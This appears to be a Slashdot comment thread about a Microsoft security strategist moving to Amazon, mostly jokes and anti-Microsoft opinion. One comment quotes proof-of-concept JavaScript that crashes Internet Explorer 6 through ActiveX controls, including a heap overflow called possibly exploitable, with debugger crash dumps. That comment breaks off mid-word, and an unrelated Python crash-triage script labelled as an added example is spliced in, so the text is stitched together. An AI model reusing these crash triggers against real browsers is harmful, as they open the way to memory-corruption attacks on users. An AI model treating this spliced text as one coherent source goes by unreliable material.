MS Security Guru Leaves for Amazon.com
Rocky Mann writes "Jesper Johansson, a security guru for Microsoft, is leaving the company to join Amazon.com. Johansson served for some five years as a 'senior security strategist', and is considered one of the world's leading experts on how to protect installations of Windows." From the article: "Johansson is also an advocate for the use of safe-passwords techniques in the enterprise. At the height of the WMF zero-day attacks earlier in 2006, Johansson offered measured advice on the use of unofficial patches and he was constantly on the move, traveling around the world to help customers figure out how to use Microsoft's products securely."
...he was constantly on the move, traveling around the world to help customers figure out how to use Microsoft's products securely.
Kind of says it all doesn't it.
"Kittens give Morbo gas!"
At some point in the conversation Mr. Ballmer said: "Just tell me it's not Amazon." I told him it was Amazon.
At that point, Mr. Ballmer picked up a chair and threw it across the room hitting a table in his office. Mr. Ballmer then said: "I'm going to fucking bury that company, I have done it before, and I will do it again. I'm going to fucking kill Amazon."
Thereafter, Mr. Ballmer resumed trying to persuade me to stay....Among other things, Mr. Ballmer told me that "Amazon is not a real company. It's a library."
I can see how Scoble and Gates leaving MS should make slashdot, but this is just random fluff. Slashdot loves reporting that (not really) important people are leaving Microsoft for Google, or apparently Amazon.
Do we get to also see the random people who leave Google and Amazon.com? Mod me down if you like, but I don't really see how this is relevant news.
...he signed a Non-Compete Agreement with Microsoft so he's working as front door security.
Thank god it is not Google. MS chairs will probably thank him publicly.
Signature Pro version 1.13.2-3 release 83.5 beta3try7 after-breakfast edition
...my Amazon account.
"How to Do Nothing," kids activities, back in print!
the smartest man alive! "...and is considered one of the world's leading experts on how to protect installations of Windows."
The Tech Terminal
Microsoft has quite a few Gurus.. is there a reason that this one guy is news?
Isn't that an oxymoron... kinda like military intelligence?
Thank you, thank you. I'll be here all night, please tip the waiter...
This sig is intentionally left blank
chair jokes? still funny after what 2yrs I do not not remember?
Non Compete jokes oh man hold on let me get my pills you're killing me.
and a bunch of "secure windows" isn't that an oxymoron jokes...
no really it is very funny.
actually I am happy to see you, however that is in fact a banana in my pocket.
I attended a small security lecture with about 25 people, he was the presenter. He walked through some real time hacks against Microsoft products that he had running in VPC. Nothing too stunning for me, but most of the people there had no clue about security so they were all blown away. I didn't see anything special. One thing of note that amused me, was the bumper sticker on his laptop that read "My other box is your Linux box". I said that I couldn't fit "My other box is a 10,000 node zombie cluster of Windows machines" on a bumper sticker....he chuckled...
If you run his name on Amazon you will find his book, which is really very good if you are a Windows Server Admin and are new to the security game.
You only have three options:
- you think you've entered some SeriousGeekSanctuary.com??? You suddenly realize "it is a /.". God, that would be a red pill for you
- feed your kitten and pretend nothing happened, go to sleep and hope it will go away. No pill and you wake up hungry, while /. still exists in its current form in the morning
- go with the rest of us and take the /. blue pill, code for nothing and post bull for the rest of the day
But here it is "IT IS A SLASHDOT, WHADA'YA EXPECT???"
p.s. since you were agreeing with being modded down, your wish come true. I on the other hand agree on being modded up.
Signature Pro version 1.13.2-3 release 83.5 beta3try7 after-breakfast edition
Just moving from one marketing gig to another.
He was done securing vista and there just wasn't anything challenging left at Microsoft for him to work on.
He's moving to Amazon to implement Trustworthy One-Clicking(TM).
His real reason for leaving: he's looking for the one, the only one that's build like an Amazon...and he doesn't want people to buy their books from a brick house.
Hey, does Amazon sell office chairs?
I guess when you've thrown enough money at the problem and it still hasn't been solved, the next logical thing would be chairs. Either that or developers.
Microsoft's Demise: See Titanic.
Titanic: 2nd worst civilian disaster next to the demise of Microsoft.
Tom
Someday, I'll have a real sig.
but it seems that while protecting Amazon's internal network, along with the protocol to customers (which presumably uses SSL), is admittedly a huge task, one can rely heavily on firewalls, server configurations, protocols, and physical security policies that can be standardized throughout the company.
While the ongoing task of securing hundreds of millions of desktops and servers owned and operated at customer sites is orders of magnitude more formidable. Maybe he didn't want to be around when the Vista hit the fan?
If I were Ballmer I would try to hire Theo de Raadt to replace him.
And if I were de Raadt, I'd reject the offer unless Microsoft opensources win32.
And if I were the customer I would not buy Windows at all.
Oh wait...
"Give orange me give eat orange me eat orange give me eat orange give me you." -Nim Chimpsky
Any tech guru leaving Google, Yahoo!, Amazon, YouTube, or any other innovative company, to go work for Microsoft, *would* be breaking news. Hate to say it, but it ain't happenin'. Somebody, prove me wrong.
it's a blue bright blue Saturday hey hey
Circumcision is child abuse.
Bad luck Amazon!
Summation 2
Cliche M$ humor attempt #1:
(#1a)
Amazon? Amazon? WTF?
I can imagine it now:
Some random M$: Exect #1
Amazon has enjoyed a moderate amount of success, therefore online book, CD, and video sales is obviously Microsoft's space. How dare they take food off of Microsoft's table by doing business in an industry kinda-sorta-maybe related to anything we at Microsoft do? And what the hell, now they're stealing our talent to do it? We own that space, we're in that space (maybe. somehow, in a future. Maybe we'll buy them out! Hey wait a second, we have a division called Microsoft Press, don't we? I think we can sue Mr. Johansson and put a stop to our competitors' stealing our employee!
Ballmer:
I'm going to F***ING KILL AMAZON! I'LL KILL THEM AND BURY THEM! I've done it before!
(meanwhile, Microsoft's new AI-equipped motorized chairs, which have been provided due to Ballmer's costing the company millions in damaged chairs and the need to avoid these recurring losses, detect Ballmer's impending aneurysm quickly roll out of the room)
(#1b)Bill Gates:
Meh. I've had my day of being a right ass. I couldn't be bothered being a hater any more. Besides, I'm quitting soon. *donates another $10bil to save the children to appease conscience*
Cliche M$ humor attempt #2:
A Microsoft Security expert? You mean, HE'S the reason Microsoft Windows is so "secure?"
Just what the hell is Amazon thinking?
(I kid, on both counts)
The Christian Right is Neither (Christian nor right). See: Matthew 23, Matthew 25, Ezekiel 16:48-50
Microsoft no longer has a coherent vision or a clear strategy. They waste their time trying to attack on several fronts, and in the meantime, their core is abandoned. Vista could have been a technological breakthrough, but they let this opportunity slip. Instead of trying to innovate, they try to emulate others and have been failing miserably. In the past, if only rumor about Microsoft developing a MsPod emerged, this would have a clear effect on Apple stocks. Nowadays, they can formally announce they are working in it and people will only nod their heads, because they are increasingly losing credibility. They spent millions with IE, had successive legal problems because of it, not to mention the security problems, and still they can't face the fact that they could profit from internet making their OS better. Cisco makes money selling routers, why microsoft can't see that they can profit from the internet by having a rock solid, fast and easy-to-use OS? Why do they think that they need to "kill" google, or "kill" iPOd on their own arenas to survive? Instead they should have invested all this money making their core business stronger, by making their OS the best OS for developers and user alike, by making people "wanting" to use Windows instead of people "Having" to run windows. After that they could even afford the luxury of competing with the iPod or with Google, but not the way they are doing now.
Your ad could be here!
... as Amazon gets pwned for being completely insecure.
Honestly, I don't understand why people we've never heard of defecting from Microsoft is newsworthy anymore.
Looks like open season on Amazon...
"We are all geniuses when we dream"
- E.M. Cioran
Jesper to Mom: It's part of my job, Mom. I fly first class, snip people's ethernet cable, and they pay me well...
Amazon to Jesper: ...(so far).
AMAZON is 94% UNIX/LINUX shop
AMAZON: Where groceries are better than Vista
I remember this guy, I ridiculed him heartily in my blog after he bitched about the way non-Microsoft people handled the WMF exploit.
I don't know why he is leaving. Being a "Microsoft Security Guru" is apparently a job with no duties. See this movie: 144,000 known viruses for Microsoft operating systems.
It appears to me that Microsoft products are deliberately not secure. Because Microsoft has a temporary monopoly, Microsoft makes more money when its product is more defective.
One of the main purposes of Vista is to get people to buy new computers. Microsoft makes most of its money by selling to computer manufacturers, and Microsoft is able to do what they want, not what is good for the customers. That's the reason Microsoft doesn't fix the bugs in Internet Explorer. When computers become slow because of viruses and spyware, people usually buy a new computer.
If Microsoft cared about its customers, it would fix these bugs in Internet Explorer, and many others:
ADODB.Recordset Filter Property
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. The interesting thing about this bug is how the same property has to be set three different times to trigger the exception.
a = new ActiveXObject('ADODB.Recordset');
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = 0x7ffffffe; } catch(e) { }
eax=001dbfdc ebx=02820e18 ecx=02821288
edx=028212a8 esi=02821288 edi=00000000
eip=4de194f7 esp=0013ade8 ebp=0013adf0
msado15!CSysString::operator=+0x12:
4de194f7 3907 cmp [edi],eax ds:0023:00000000=????????
This bug was reported to Microsoft on March 6th, 2006.
Internet.HHCtrl Image Property
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug is interesting because a small heap overflow occurs each time this property is set. The bug is difficult to detect unless heap verification has been enabled in the global debug flags for iexplore.exe. The demonstration below results in a possibly exploitable heap corruption after 128 or more iterations of the property set.
var a = new ActiveXObject("Internet.HHCtrl.1");
var b = unescape("XXXX");
while (b.length < 256) b += b;
for (var i=0; i<4096; i++) {
a['Image'] = b + "";
}
eax=00030288 ebx=00030000 ecx=7ffdd000
edx=00030608 esi=58585850 edi=00000022
eip=7c911f52 esp=0013afcc ebp=0013b1ec
ntdll!RtlAllocateHeap+0x31b:
7c911f52 8a4605 mov al,[esi+0x5] ds:0023:58585855=??
This bug was reported to Microsoft on March 6th, 2006.
StructuredGraphicsControl SourceURL
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug appears to be triggered by a call to URLOpenBlockingStream() with a NULL pointer referenced by the ppStream argument. The only way I found to trigger this bug is by creating the object through the ActiveXObject interface -- using the standard object/classid syntax (as described here) does not result in a crash.
var a = new ActiveXObject('DirectAnimation.StructuredGraphicsControl');
a.sourceURL = 'CrashingBecauseStreamPtrNotInitialized';
eax=00000000 ebx=7726d35c ecx=02481f30
edx=0013b1a4 esi=00000000 edi=00000000
eip=772ba3bc esp=0013b18c ebp=0013b1b8
urlmon!CBaseBSCB::KickOffDownload+0x7a:
772ba3bc 8b08 mov ecx,[eax] ds:0023:00000000=????????
This bug was reported to Microsoft on March 6th, 2006.
Table.Frameset
The follo
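An added example, not part of the comment above or of the bug reports it quotes: a small triage script that reads the symbol and faulting-instruction lines from the three crash dumps and separates null-pointer dereferences from a fault whose address is made of input bytes. The regular expressions and the `triage` function are this example's own; the dump lines are copied from the comment.

```python
import re

# Symbol and faulting-instruction lines copied from the three crash dumps quoted above.
DUMPS = {
    "ADODB.Recordset Filter": """msado15!CSysString::operator=+0x12:
4de194f7 3907 cmp [edi],eax ds:0023:00000000=????????""",
    "Internet.HHCtrl Image": """ntdll!RtlAllocateHeap+0x31b:
7c911f52 8a4605 mov al,[esi+0x5] ds:0023:58585855=??""",
    "StructuredGraphicsControl SourceURL": """urlmon!CBaseBSCB::KickOffDownload+0x7a:
772ba3bc 8b08 mov ecx,[eax] ds:0023:00000000=????????""",
}

# "module!symbol+0xoffset:" line, then "eip opcode mnemonic operands seg:sel:address=value".
SYMBOL = re.compile(r"^(\w+)!(.+)\+0x([0-9a-f]+):$", re.M)
FAULT = re.compile(
    r"^([0-9a-f]{8}) [0-9a-f]+ (\w+) (\S+) \w\w:[0-9a-f]{4}:([0-9a-f]{8})=", re.M)


def triage(dump):
    """Return (module, access, address, verdict) for one debugger crash excerpt."""
    sym, fault = SYMBOL.search(dump), FAULT.search(dump)
    if not sym or not fault:
        raise ValueError("unrecognised crash excerpt")
    mnemonic, operands = fault.group(2), fault.group(3)
    addr = int(fault.group(4), 16)
    # A memory operand in destination position is a write, except for
    # compare-type instructions, which only read.
    is_write = operands.startswith("[") and mnemonic not in ("cmp", "test")
    access = "write" if is_write else "read"
    if addr < 0x10000:
        verdict = "null-pointer dereference"
    elif all(0x20 <= b <= 0x7E for b in addr.to_bytes(4, "big")):
        # Every byte of the address is printable ASCII, so input data
        # (here the "XXXX" filler) ended up being used as a pointer.
        verdict = "pointer derived from input data (memory corruption)"
    else:
        verdict = "unclassified"
    return sym.group(1), access, addr, verdict


if __name__ == "__main__":
    for name, dump in DUMPS.items():
        module, access, addr, verdict = triage(dump)
        print(f"{name}: {access} at {addr:#010x} in {module}: {verdict}")
```

The second dump is the one to prioritise for patching: the faulting address 0x58585855 is the string filler plus an offset, which matches the comment's description of heap corruption.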
...you must be new here ;)
MS Security Guru
[snigger]
spoonerize "magic trackpad"
If I had been a 'senior security strategist' at Microsoft for the last five years... I'd leave that off of my resume!
Thanks for your excellent discussion of the issues
Given how Microsoft's security track record has gone, I think I shall take my online books business to a new vendor.
Skot Nelson music is my saviour / i was maimed by rock and roll
Free crap from Amazon this Christmas!
i didn't know there was such a thing
http://www.ronpaul2008.com/ Ron Paul for President 2008 http://www.infowars.com/
"Mod me down if you like, but I don't really see how this is relevant news."
It was news to me that Microsoft even HAD a "security strategist".
I wonder what he did all day. Review the 10 year backlog of e-mail warning that active scripting might be a gaping security hole?
I did not know Microsoft had a security expert!
Religion is the main cause of atheism.
This seems like a demotion to me. The security problems Amazon.com faces can't possibly be as big as the security problems Microsoft faces. It is relatively easy to harden a server farm, compared to making an operating system that can stay reasonably secure even when run by novices and below.
I went to Jesper's presentation at Auscert in 2005 where he came out with the stunning "write down your passwords" revelation. (Previously espoused by Bruce Schneier years ago.)
His talk was an hour of how to jam as many funny pictures into a talk and attempt to get "in" with the geek crowd by poking fun at the security establishment.
It was kind of pathetic.
He then went on to attend a Thor Larholm presentation and attack Thor at the end of it. It was stupid and untidy. I thought Thor handled it well. Jesper lost all respect from me @ that point.
BTW the attack was basically Thor going through some old .JPG processing vulnerability in windows and examining it. He stated at one point this can't have been reviewed as a very basic buffer overflow was missed.
Jesper then piped up and stated it was reviewed "because I reviewed it." Blah blah blah.
Jesper and another MS Security manager (I think there are about 700 managers personally responsible for security @ Microsoft.) continued the attack making themselves look rather silly and Thor look very balanced and well mannered.
"My other box is your Linux box"
That's a stupid thing for him to say. It shows his malicious intentions and his failure to carry through.
80% of the world's spam comes from security problems in his platform. This guy's work is either incompetent or hampered by others. Blaming it on his users is not good enough while Mac, Linux and Sun users are blissfully unaware of the Windoze swamp.
To date there are no such problems with free software, no worms, no trojans, ad servers, nothing, naada, zip. Sure, that dick might be able to root my particular box if he tried hard enough. So what? I can clean it up in twenty minutes and I've got enough redundancy and back ups to not even notice. Unlike the pay per play Windoze world, I can have live backups on multiple machines without losing my shirt.
All that silly bumper sticker shows is his intent to break something that works better than M$ junk. So far all efforts in that direction have failed. Banks, search engines and other high profile chair targets continue working as usual, unless some M$ net storm messes things up.
I said that I couldn't fit "My other box is a 10,000 node zombie cluster of Windows machines" on a bumper sticker....he chuckled...
He was probably thinking, "My Windows bot net is bigger than yours. "
Friends don't help friends install M$ junk.
If so, I'll bet he's looking forward to a job that's possible.
Friends don't help friends install M$ junk.
Maybe he should get together with the Enron accounting guru.
I went to a MS security seminar where he was the presenter. He did a really amazing job and cracked a lot of MS jokes. Showed the lack of security in MS products and where it really wasn't as big as it was hyped to be. He was a great presenter and a nice guy. Helped me with some questions. MS lost a good employee here.
Tim Smith - Ramblings from Nerd Land
By your logic, anyone leaving M$ is unimportant. Maybe they even cease to exist.
Patents Drive Free Software as Hurricanes Drive Construction Industry
Sweet! Free books and movies!
At the time I'm posting, I counted the occurrences of the word "chair" in the visible threads (threshold: 1).
It's 7 out of 72 threads. A clean 10% of posters give credit to Mr. Ballmer's habits.
Microsoft has a security guru? What OS does he use?
It's news to me.
I can't stand it when people act like they were forced to read a news article. Even worse, that they act like they were forced to waste their time commenting on it.
GET A LIFE
"is considered one of the world's leading experts on how to protect installations of Windows."
And Amazon wants this guy?
Time to stop using your credit card at Amazon.
Yeah, this is snark. Sue me.
Richard Steven Hack - This sig is TOO GODDAMN SHORT TO DO ANYTHING USEFUL WITH! MORONS!
I'm an advocate for safe-lock techniques on automobiles. Does that make me an automobile security expert?